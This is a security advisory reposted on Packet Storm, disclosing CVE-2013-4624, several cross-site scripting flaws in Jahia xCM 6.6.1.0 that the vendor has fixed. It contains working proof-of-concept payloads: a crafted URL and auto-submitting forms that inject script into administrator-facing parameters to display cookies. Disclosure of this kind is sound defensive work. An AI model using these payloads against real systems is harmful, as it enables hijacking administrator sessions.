exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Jahia xCM 6.6.1.0 r43343 Cross Site Scripting

Jahia xCM 6.6.1.0 r43343 Cross Site Scripting
Posted Aug 1, 2013
Authored by High-Tech Bridge SA | Site htbridge.com

Jahia xCM version 6.6.1.0 r43343 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2013-4624
SHA-256 | c5ef8030d861fa130fe564ae69779015f7e7b77b93b60e3fb55f9365cda7843a

Jahia xCM 6.6.1.0 r43343 Cross Site Scripting

Change Mirror Download
Advisory ID: HTB23159
Product: Jahia xCM
Vendor: Jahia Solutions Group SA
Vulnerable Version(s): 6.6.1.0 r43343 and probably prior
Tested Version: 6.6.1.0 r43343
Vendor Notification: June 5, 2013
Vendor Patch: July 17, 2013
Public Disclosure: July 31, 2013
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2013-4624
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in Jahia xCM, which can be exploited to perform cross-site scripting attacks against administrator of vulnerable application.


1) Multiple Cross-Site Scripting (XSS) Vulnerabilites in Jahia xCM: CVE-2013-4624

1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data in "site" HTTP GET parameter passed to "/engines/manager.jsp" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

The exploitation example below uses JavaScript 'alert()' function to display administrator's cookies:

http://[host]/engines/manager.jsp?conf=repositoryexplorer&site=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E


1.2 The vulnerability exists due to insufficient filtration of user-supplied data in "searchString" HTTP POST parameter passed to "/administration/" URI when "do=users" and "sub=search". A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

The exploitation example below uses JavaScript 'alert()' function to display administrator's cookies:


<form action="http://[host]/administration/?do=users&sub=search" method="post" name="main">
<input type="hidden" name="searchString" value="'><script>alert(document.cookie);</script>">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>



1.3 The vulnerability exists due to insufficient sanitisation of user-supplied data in "username", "manage-user-property#j:firstName", "manage-user-property#j:lastName", "manage-user-property#j:email" and "manage-user-property#j:organization" HTTP POST parameters passed to "/administration/" URI when "do=users" and "sub=processCreate". A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

The exploitation example below uses JavaScript 'alert()' function to display administrator's cookies:


<form action="http://[host]/administration/?do=users&sub=processCreate" method="post" name="main">
<input type="hidden" name="username" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:firstName" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:lastName" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:email" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:organization" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="actionType" value='save'>
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>


-----------------------------------------------------------------------------------------------

Solution:

Apply hotfix 7, that is available to all customers:
https://www.jahia.com/fr/home/support/customers-extranet/enterprise-jahia-downloads/jahia-xcm---version-66.html

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23159 - https://www.htbridge.com/advisory/HTB23159 - Multiple XSS Vulnerabilities in Jahia xCM.
[2] Jahia xCM - http://www.jahia.com - Jahia xCM is the unified interface to access, personalize and manage best of breed WCM, portal and document management features.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close